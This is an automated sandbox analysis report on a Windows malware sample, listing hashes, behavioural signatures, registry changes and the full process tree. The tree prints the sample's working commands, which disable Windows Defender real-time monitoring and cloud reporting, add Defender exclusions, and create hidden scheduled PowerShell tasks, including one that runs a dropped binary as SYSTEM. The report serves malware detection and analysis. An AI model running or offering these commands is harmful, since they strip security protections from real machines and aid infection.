Analysis
-
max time kernel
153s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
31/10/2022, 22:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
0a29a0dc7519c70f9496cc9edc42f396
-
SHA1
d275c7f48a3a9c7e8504280b1e0487bb7c3b5747
-
SHA256
77d090bfb26e7f9082108a82e3248706f9f2b5a86f96dc0a628495461211555e
-
SHA512
c7792ab61c37d4e49282ddb2901435cf760c3c91399ef53050323a2500ebd1c6e3c90dfcd138a68dcdefdca499379e72152a7f4331852a3d8d4547b2d25fd82e
-
SSDEEP
196608:91OJSLWHeQmR7mACiY/jcOcOPosl6xfQvQ:3OJI7mACiG3v6xovQ
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" reg.exe -
Executes dropped EXE 4 IoCs
pid Process 544 Install.exe 1252 Install.exe 1648 QHhAKnF.exe 800 UbWVVsy.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 1424 file.exe 544 Install.exe 544 Install.exe 544 Install.exe 544 Install.exe 1252 Install.exe 1252 Install.exe 1252 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 9 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol QHhAKnF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat UbWVVsy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini QHhAKnF.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol QHhAKnF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files (x86)\SvbbHukzU\TThBQi.dll UbWVVsy.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UbWVVsy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UbWVVsy.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UbWVVsy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UbWVVsy.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job schtasks.exe File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job schtasks.exe File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2020 schtasks.exe 1392 schtasks.exe 1724 schtasks.exe 276 schtasks.exe 1348 schtasks.exe 824 schtasks.exe 1156 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 19 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections UbWVVsy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix UbWVVsy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" UbWVVsy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings UbWVVsy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 UbWVVsy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad UbWVVsy.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings UbWVVsy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" UbWVVsy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" UbWVVsy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 UbWVVsy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 924 powershell.EXE 924 powershell.EXE 924 powershell.EXE 1616 powershell.EXE 1616 powershell.EXE 1616 powershell.EXE 1060 powershell.EXE 1060 powershell.EXE 1060 powershell.EXE 1504 powershell.EXE 1504 powershell.EXE 1504 powershell.EXE 800 UbWVVsy.exe 800 UbWVVsy.exe 800 UbWVVsy.exe 800 UbWVVsy.exe 800 UbWVVsy.exe 800 UbWVVsy.exe 800 UbWVVsy.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 924 powershell.EXE Token: SeDebugPrivilege 1616 powershell.EXE Token: SeDebugPrivilege 1060 powershell.EXE Token: SeDebugPrivilege 1504 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1424 wrote to memory of 544 1424 file.exe 26 PID 1424 wrote to memory of 544 1424 file.exe 26 PID 1424 wrote to memory of 544 1424 file.exe 26 PID 1424 wrote to memory of 544 1424 file.exe 26 PID 1424 wrote to memory of 544 1424 file.exe 26 PID 1424 wrote to memory of 544 1424 file.exe 26 PID 1424 wrote to memory of 544 1424 file.exe 26 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 544 wrote to memory of 1252 544 Install.exe 27 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1608 1252 Install.exe 29 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1252 wrote to memory of 1644 1252 Install.exe 31 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1608 wrote to memory of 1616 1608 forfiles.exe 33 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1644 wrote to memory of 1296 1644 forfiles.exe 34 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1616 wrote to memory of 824 1616 cmd.exe 36 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1296 wrote to memory of 1744 1296 cmd.exe 35 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1616 wrote to memory of 1676 1616 cmd.exe 38 PID 1296 wrote to memory of 1076 1296 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Users\Admin\AppData\Local\Temp\7zS6115.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Users\Admin\AppData\Local\Temp\7zS734D.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:824
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1676
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1744
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1076
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGPOIrlNR" /SC once /ST 18:54:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGPOIrlNR"4⤵PID:1128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGPOIrlNR"4⤵PID:2008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe\" KP /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1348
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A5E5AC8B-FE41-4058-B00D-9DFC649AA1A7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:1192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:768
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1396
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1744
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:556
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:912
-
C:\Windows\system32\taskeng.exetaskeng.exe {EC6CFC43-B352-44AF-B53B-1AF5DE83BD95} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exeC:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe KP /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gspWoPfEo" /SC once /ST 21:48:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gspWoPfEo"3⤵PID:1076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gspWoPfEo"3⤵PID:1748
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1188
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1160
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNzfrQBUu" /SC once /ST 10:16:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNzfrQBUu"3⤵PID:976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNzfrQBUu"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:323⤵PID:1820
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:643⤵PID:1544
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:323⤵PID:580
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵PID:840
-
-
-
